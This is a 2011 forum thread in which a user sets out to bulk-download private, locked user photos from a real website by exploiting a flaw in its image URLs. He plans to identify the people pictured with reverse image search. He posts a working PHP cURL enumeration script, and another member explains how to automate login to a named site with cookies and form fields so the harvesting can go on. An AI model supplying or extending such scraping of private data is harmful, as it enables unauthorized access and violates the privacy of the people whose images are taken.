ThisisLegal.com

ThisisLegal Forums

Welcome to the forums! A chance for site members to chat and get help.

You are not logged in.

#1 2011-03-09 23:19:56

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Help with PHP fusking anyone?

Hello everyone!

I've been testing a website (just for fun) and found out about
a possible vulnerability in the way it manages images uploaded
by it's users. I think I found a way to access private and locked images without needing the user's permission.

Right now, it's a real pain to access any of these images and there
is now way of knowing whose picture you're accessing. But I think
I can make a lot more sense of the accumulated data if I can grab a lot of pictures and analyze them with TinEye (http://www.tineye.com)

Can any one of you guys help me whip up something that can fusk the images from the website?

The format string of the URL is something like this:

http://<target site>/members/delete_photo.php?id=delete-photo&sbook_id=200050964

On accessing the page, It returns an image (as specified by the sbook_id number). Do you know how I could increment the sbook_id number sequentially and grab the images displayed for each number and dump them on to some folder on my computer?

I read somewhere that a fusker can parse this:
http://<somesite.com>/images/image[000-100].jpg

and return all images ranging from image000, image111, etc. to image100.

But in my case, the images aren't stored as a sequentially, only the URL to access them can be fusked. The images are stored with filenames that look like their MD5 hash.

Can you help me extract the images from the site by suggesting a method of fusking the URL and then reading the returned HTML for the <img src> tag and retrieving the images therin?

Offline

#2 2011-03-11 12:45:26

kjangwa
Member
Registered: 2010-03-27
Posts: 23

Re: Help with PHP fusking anyone?

Well i've learned something new, never heard of fusking before.
It seems like a good programming project, you just need a simple script to access the URL and do a little parsing.
What programming language do you know?

Offline

#3 2011-03-13 23:44:37

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

I'm learning PHP at the moment and it's embarassing but the language I feel at home with is Visual Basic .NET

Offline

#4 2011-03-13 23:49:54

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

kjangwa, if you found fusking interesting, you'll absolutely be blown away by TinEye. Check out the unbelievably scary yet supreme power of TinEye at www.tineye.com. It's an image search engine. :-)

Offline

#5 2011-03-15 15:07:19

kjangwa
Member
Registered: 2010-03-27
Posts: 23

Re: Help with PHP fusking anyone?

Yes I have already used both TinEye and GazoPa to aid me in solving challenges.
Nothing wrong with Visual Basic .NET.
I am also learning PHP and i think cURL is what you need, however i have never used it.
If you feel it will be helpful to you, i will have a go at making a simple script.

Offline

#6 2011-03-16 01:03:55

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

If you could write it, that'd really helpful. I'm new to PHP and I looked around for some tutorials on cURL and wget to see if it could be solved using that. I'm convinced cURL can get the job done and I'm gonna try and make my own script but I'm not really sure if I'll get it right.

If I do, I'll share it here for sure.

Offline

#7 2011-03-17 03:24:32

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

Hi, I think I've successfully created an early version of my fusker script. Here's the code that the script will exploit:

Filename: test.php

<html>
<head>
<title>Target PHP Page</title>
</head>

<body>
<?php
	$filenm = isset($_GET['file'])?$_GET['file']:NULL;
	$index	= isset($_GET['index'])?$_GET['index']:NULL;
	$filenm==NULL?$filenm="default" AND $index="00":$filenm;
	$index==NULL?$index="00" AND $filenm="default":$index;
	
	$path	= $filenm.$index.".jpg";
	echo "<tt><center>Filename: $path</tt><br><br>";
	echo "<img src=\"$path\"</center>";
?> 
</body>
</html>

Offline

#8 2011-03-17 03:26:02

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

Here's the code for my fusker script:

Filename: fusker.php

<html>
<head>
	<title>PHP Fusker *BETA</title>
</head>
<body>
<STYLE TYPE="text/css">
<!--
BODY
   {
   color:orange;
   background-color:black;
   font-family:sans-serif;
   }
A:link{color:blue}
A:visited{color:purple}
-->
</STYLE>
<?php
	echo "<h1><center>PHP Fusker <tt><small>*BETA</tt></small></center></h1>";
	function get_web_page( $url )
{
	// This function was retrieved from:
	// http://nadeausoftware.com/articles/2007/06/php_tip_how_get_web_page_using_curl
	// http://www.php.net/manual/en/function.curl-setopt-array.php#89850
	
	
    $options = array(
        CURLOPT_RETURNTRANSFER => true,     // return web page
        CURLOPT_HEADER         => false,    // don't return headers
        CURLOPT_FOLLOWLOCATION => true,     // follow redirects
        CURLOPT_ENCODING       => "",       // handle all encodings
        CURLOPT_USERAGENT      => "spider", // who am i
        CURLOPT_AUTOREFERER    => true,     // set referer on redirect
        CURLOPT_CONNECTTIMEOUT => 120,      // timeout on connect
        CURLOPT_TIMEOUT        => 120,      // timeout on response
        CURLOPT_MAXREDIRS      => 10,       // stop after 10 redirects
    );

    $ch      = curl_init( $url );
    curl_setopt_array( $ch, $options );
    $content = curl_exec( $ch );
    $err     = curl_errno( $ch );
    $errmsg  = curl_error( $ch );
    $header  = curl_getinfo( $ch );
    curl_close( $ch );

    $header['errno']   = $err;
    $header['errmsg']  = $errmsg;
    $header['contents'] = $content;
    return $header;
}
	echo "<br>";
	echo "<hr>";
	
	$startidx = isset($_GET['start'])?$_GET['start']:1;
	$endidx	  = isset($_GET['end'])?$_GET['end']:24;
	$endidx<$startidx?$endidx=24:$endidx;
	$startidx<=0?$startidx=1:$startidx;
	$imgnum=1;
	//$endidx<0?$endidx=24:$endidx;
	
	for($i=$startidx; $i<=$endidx; $i++, $imgnum++)
	{
				$page_info = (get_web_page("http://localhost:82/test.php?file=Picture&index=$i"));
		$html = $page_info['contents'];
		$html = str_replace("<img src=\"", "<img src=\"http://localhost:82/", $html);
		echo "<center><h2>Image Number: $imgnum</h2></center><hr>";
		echo $html;
		echo "<hr>";
	}
	echo "<center><tt>PHP Fusker *BETA</tt></center>";
?>
</body>
</html>

Offline

#9 2011-03-17 03:40:43

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

This is how it works (for anyone who's interested):

You need to setup a web server and configure a virtual host
so that it can host two sites at once
(it's very easy to do that using WAMP)
(more info here:
http://www.eggheadcafe.com/tutorials/aspnet/05de3a63-7a96-4e65-94d9-c090896290e8/creating-multiple-virtual-sites-on-a-wamp-server-installation.aspx)

The target site must run in "c:\wamp\www\target\test.php"

The fusker site is hosted at "c:\wamp\www\fusker.php"

After the virtual hosts are properly set up, typing http://localhost/fusker.php should show the PHP fusker page.

And typing http://localhost:82/test.php should show the target site (to one that's to be fusked)

Now the target page shows different images to the user using this format: http://localhost:82/test.php?file=FILENAME&index=INDEX_NUMBER

FILENAME will be concatenated with INDEX_NUMBER and the result is added the '.jpg' extension and loaded from the site's root dir. If the file doesn't exist, no image will be shown.

If either FILENAME or INDEX_NUMBER values are missing, a default picture (hardcoded as 'default00.jpg' will be shown)

Offline

#10 2011-03-17 03:51:44

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

Here's how the fusker page works:

To fusk the target PHP page, visit http://localhost/fusker.php
(this automatically fusks images 1-24 from the target site. The names of the images are hardcoded as Picture1, Picture2, Picture3, etc. This can easily be changed)

A range of the pictures to be fusked can be specified by the 'start' and 'end' parameters in this way:

http://localhost/fusker.php?start=5&end=19

There is some basic error checking to see that 'end' is never less that 'start' and that 'start' is always a positive value or 0.

Offline

#11 2011-03-17 04:03:04

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

I just noticed that the code I posted earlier has some formatting errors "color<img src='/shout/shout/smilies/o.gif'>range" shows up where it should've been "color orange";
so I uploaded both the scripts online. You can check it out here:

test.php: http://pastebin.com/t3TkW83R
fusker.php: http://pastebin.com/Lj12D0iH

Fusking using this script might take a lot of time though.
If you need more efficiency and don't mind programming something yourself, you can use parallelcURL by Pete Warden
https://github.com/petewarden/ParallelCurl

Offline

#12 2011-03-20 09:00:49

kjangwa
Member
Registered: 2010-03-27
Posts: 23

Re: Help with PHP fusking anyone?

Nice work xyberz09.

Offline

#13 2011-03-21 05:02:48

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

Thanks, kjangwa!! smile

The fusker works fine, but I have another problem now. To fusk the site, it must first login to it otherwise I can't access the files that I need to fusk. Now I found some info on logging on to sites using cURL online, but I haven't yet been successful in implementing it. Could you modify my script a little so that it can login to:
http://www.mig33.com/sites/index.php

...before it begins fusking?

P.S. It's a bit confusing to implement a login script using cURL because this site uses a JS application to send user data to the site. I tried to figure out the actual POST data that's being sent using TamperData but I couldn't make any sense of it. I see a username being passed on, but no password. Just some SID value.

Offline

#14 2011-03-21 12:57:37

kjangwa
Member
Registered: 2010-03-27
Posts: 23

Re: Help with PHP fusking anyone?

Yeah, it looks like it uses AJAX/json script to access an xml database, that then generates the SID.
I've not seen a login like that before.
Try FFplugin HTTPheaders to see this info.

Also using FFplugin 'WebDeveloper toolbar' to 'view form information', you can see this:
>
Name:            Value:
------------     --------
session_user:    Username   
session_p:       Password   
rememberme:      on           
login_invisible: on           
submit:          Login
<
So i think you would have to set these 5 Name:Value pairs in your post parameters.

What you could try is simply logging in with you webbrowser and getting your cookies.
Then put those cookies into your cURL script and then access
the pages you want with cURL.

Might be a good idea to make an adapted copy of your script
and practice with it here on TiL;
Both trying to login,get cookie then access another page. And also getting a valid cookie first then plugging that into your cURL script.

Offline

#15 2011-03-24 01:08:03

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

Thanks. I'll try experimenting a bit and see what I can come up with. I'd like to fully automate the login process so I won't have to send my cookies manually. If I succeed, I'll post the edited script here. Thanks for your help smile

Offline

Board footer

Powered by FluxBB